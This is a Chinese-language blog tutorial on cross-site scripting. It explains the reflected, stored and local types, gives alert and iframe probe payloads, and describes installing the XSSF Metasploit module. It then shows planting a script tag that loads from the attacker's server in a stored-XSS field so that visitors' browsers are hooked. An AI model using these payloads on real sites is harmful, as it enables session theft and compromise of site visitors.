码迷,mamicode.com
首页 > 其他好文 > 详细

xss

时间:2015-12-24 00:43:15      阅读:178      评论:0      收藏:0      [点我收藏+]

标签:xss


XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。比如这些代码包括HTML代码和客户端脚本。网页在于用户互动的过程中存在用户构造特定指令来让网页执行非预定任务。这里有点sql注入的赶脚。

XSS漏洞按照攻击利用手法的不同,有以下三种类型:

类型A,本地利用漏洞,这种漏洞存在于页面中客户端脚本自身。其攻击过程如下所示:

Alice给Bob发送一个恶意构造了Web的URL。

Bob点击并查看了这个URL。

恶意页面中的JavaScript打开一个具有漏洞的HTML页面并将其安装在Bob电脑上。

具有漏洞的HTML页面包含了在Bob电脑本地域执行的JavaScript。

Alice的恶意脚本可以在Bob的电脑上执行Bob所持有的权限下的命令。

类型B,反射式漏洞,这种漏洞和类型A有些类似,不同的是Web客户端使用Server端脚本生成页面为用户提供数据时,如果未经验证的用户数据被包含在页面中而未经HTML实体编码,客户端代码便能够注入到动态页面中。其攻击过程如下:

Alice经常浏览某个网站,此网站为Bob所拥有。Bob的站点运行Alice使用用户名/密码进行登录,并存储敏感信息(比如银行帐户信息)。

Charly发现Bob的站点包含反射性的XSS漏洞。

Charly编写一个利用漏洞的URL,并将其冒充为来自Bob的邮件发送给Alice。

Alice在登录到Bob的站点后,浏览Charly提供的URL。

嵌入到URL中的恶意脚本在Alice的浏览器中执行,就像它直接来自Bob的服务器一样。此脚本盗窃敏感信息(授权、信用卡、帐号信息等)然后在Alice完全不知情的情况下将这些信息发送到Charly的Web站点。

类型C,存储式漏洞,该类型是应用最为广泛而且有可能影响到Web服务器自身安全的漏洞,骇客将攻击脚本上传到Web服务器上,使得所有访问该页面的用户都面临信息泄漏的可能,其中也包括了Web服务器的管理员。其攻击过程如下:

Bob拥有一个Web站点,该站点允许用户发布信息/浏览已发布的信息。

Charly注意到Bob的站点具有类型C的XSS漏洞。

Charly发布一个热点信息,吸引其它用户纷纷阅读。

Bob或者是任何的其他人如Alice浏览该信息,其会话cookies或者其它信息将被Charly盗走。

类型A直接威胁用户个体,而类型B和类型C所威胁的对象都是企业级Web应用。

Xss漏洞的探查过程:

写一个实验脚本来看网站是否将我们写的脚本也当做指令来执行了,由此判断是否有xss漏洞。存储型xss漏洞。

<script>alert(“xss”)</script>

增加行内框架,为下一步做准备

<iframe src=”http://www.baidu.com “  width=“” height=“”></iframe>

这里写出一个标记来实现插入链接的目的。前面 我们已经确认了此处已存在漏洞,那么这一步就是具体的来利用了。

                            技术分享

 


跨站攻击

技术分享

 

Xss的高级利用:xssf

Xssf的安装过程:在我们的kali或者bt中,并没有直接预装xssf,我们使用xssf时需要自己从Googlecode上面下,但是Googlecode上的下载可能会被墙,所以我们需要用另外种方法来完成安装。

http://www.freebuf.com/articles/system/8440.html

 

首先把Googlecode上的xssf转到github上去,然后从github上将xssf下载下来。下载下来之后,解压,将解压的子文件夹里面的文件复制到我们kali中的msf相对文件夹里,接下来就可以进入msfconsoleload xssf了。

 

Xssf的运用实例:http://www.2cto.com/Article/201212/173287.html

 

技术分享

Xssf中有多种命令

技术分享

我们在xssf_urls中获得我们xssf连接的链接

技术分享

我们将xssf_urls中得到的链接写入到我们之前发现的存储型漏洞中,然后,当其他人浏览这个链接后就会中招。链接从genericxss injection中获取。

这里我们可以写入<script    type=”text/javascript”  src=”http://.....”></script>

技术分享

别人中招后,我们可以查看他的相关信息。

技术分享


Xss原理与剖析:http://www.freebuf.com/articles/web/40520.html

三种xss方式及解析:http://www.freebuf.com/articles/web/42727.html

跨站脚本攻击初探:http://netsecurity.51cto.com/art/201301/376873.htm

 


本文出自 “天下皆白,哼” 博客,请务必保留此出处http://xiaoqin00.blog.51cto.com/10468367/1727703

xss

标签:xss

原文地址:http://xiaoqin00.blog.51cto.com/10468367/1727703

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!